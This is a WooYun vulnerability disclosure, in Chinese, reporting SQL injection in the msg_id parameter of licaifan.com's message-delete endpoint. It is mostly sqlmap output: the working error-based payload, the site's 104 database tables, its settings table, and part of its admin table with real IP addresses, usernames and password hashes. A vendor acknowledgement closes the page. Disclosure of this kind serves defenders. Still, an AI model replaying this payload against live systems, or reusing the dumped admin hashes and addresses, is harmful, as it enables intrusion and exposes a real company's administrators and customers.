乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-08: 细节已通知厂商并且等待厂商处理中 2015-06-08: 厂商已经确认,细节仅向厂商公开 2015-06-18: 细节向核心白帽子及相关领域专家公开 2015-06-28: 细节向普通白帽子公开 2015-07-08: 细节向实习白帽子公开 2015-07-23: 细节向公众公开
我是皮吐皮跟风少年
登陆后查看消息 可以删除消息
数据包如下:http://www.licaifan.com:80/user/delMessagepost msg_id=1111&action=deletemsg_id参数存在sql注入
web application technology: PHP 5.3.3, Nginxback-end DBMS: MySQL 5.0available databases [3]:[*] information_schema[*] licaifan[*] test
Database: licaifan[104 tables]+--------------------------+| YiiSession || user || account || account_cash || account_log_150202 || account_recharge || adm_admin || adm_award_log || adm_company_users || adm_email_template || adm_login_record || adm_logs || adm_other_type || area || award_log || card_auth || consumer_credit_gain_log || consumer_invest_log || cps_lanlicai || error || exp_code || exp_winner || frozen_log || hlf || hlf_invest_detail_1900 || hlf_invest_log || incubator_apply || invest_bonus_log || invest_bonus_log_bak || invest_log || invest_log_bak || invest_view || ios_download || ios_push || lease_gain_log || lease_invest_log || lease_project || lease_project_payment || lease_project_repayment || loan_application || login_record || meet_apply || message || mobile_area || mobile_change_log || nation || net_invest_log || oauth_access_tokens || oauth_clients || oauth_jwt || oauth_refresh_tokens || oauth_scopes || oneYearCoupons || payment || project_apply || project_award || project_comment || project_company || project_gain_record || project_invest_record || project_payment || project_pic || project_project || project_related || project_repayment || project_transfer || project_transfer2 || project_view || project_vouch || protected_answer || protected_questions || recharge_info_log || redemption || redemption_detail || remindmsg_log || research || score_log || score_setting || score_to_money || service_log || sms_code_check_record || sms_send_log || supertracker || system_setting || trade_gain_log || trade_invest_log || trade_project || trade_project_payment || trade_project_repayment || transfer_available || transfer_log || upload_pic || user_auth || user_extend_mobile || user_login_log || user_qq_userinfo || user_refer || user_remind || user_sina_userinfo || user_tzj || user_weixin_userinfo || vouch_pic || whos_online || withdraw_log |+--------------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: msg_id (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: msg_id=111) AND (SELECT 9995 FROM(SELECT COUNT(*),CONCAT(0x717a627a71,(SELECT (ELT(9995=9995,1))),0x7178787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (6820=6820&action=delete---web application technology: PHP 5.3.3, Nginxback-end DBMS: MySQL >= 5.0.0Database: licaifanTable: system_setting[15 entries]+----+-----------------------+----------+-------------+| id | type | value | description |+----+-----------------------+----------+-------------+| 1 | invest_threshold | 1000 | 投资起点为1000元 || 2 | itemsPerPageInAccount | 10 | 账户管理每页显示个数 || 3 | | 10 | 消息每页显示个数 || 4 | announcement | <blank> | 网站公告 || 5 | minimum_withdraw | | 最低提现额度 || 6 | payment | pay19 | 一九付 || 7 | lucky | 1403 | NULL || 8 | withdraw_fee_type | | 提现手续费收取方式 || 9 | repayment | | 一九付 || 10 | wappayment | | 连连支付 || 11 | payment_bak | shengpay | || 12 | payment_verify | llpay | 连连支付 || 13 | apppayment | wap | 客户端充值渠道 || 14 | coupon_probability | 100 | 周年红包活动中奖率 || 15 | withdraw_fee_number | 3 | 免手续费提现次数 |+----+-----------------------+----------+-------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: msg_id (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: msg_id=111) AND (SELECT 9995 FROM(SELECT COUNT(*),CONCAT(0x717a627a71,(SELECT (ELT(9995=9995,1))),0x7178787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (6820=6820&action=delete---web application technology: PHP 5.3.3, Nginxback-end DBMS: MySQL >= 5.0.0Database: licaifanTable: adm_admin[36 entries]+----------+-----------------+--------+---------------------+------------+------------------------------------------+| admin_id | addip | status | addtime | userName | userPassword |+----------+-----------------+--------+---------------------+------------+------------------------------------------+| | 203.100.80.24 | 1 | | admin | || 1 | 106.185.46.44 | 1 | | | 9f59c01c21bea721ca5cbba9984cd25e1c479a18 || | 203.100.93.15 | | 2014-10-29 10:05:22 | | || | 203.100.93.15 | | | | || | 106.120.244.158 | | 2014-09-29 18:11:27 | | || 1 | | | | | 79759dbab437869857f4443d81a3e25f9e9b2300 || 1 | | | | | || 1 | 203.100.93.15 | | | | || 1 | | | | | || | | | 2015-02-15 11:15:53 | luoxin | || | | 1 |
可获取所有用户用户名密码 身份信息 银行卡信息 交易密码 手机号 余额 等等等等
使用框架的查询方法
危害等级:高
漏洞Rank:15
确认时间:2015-06-08 10:13
多谢漏洞作者给我们提出这么重要的问题~我们会自信检查自己的网站,避免这种漏洞的出现!!
暂无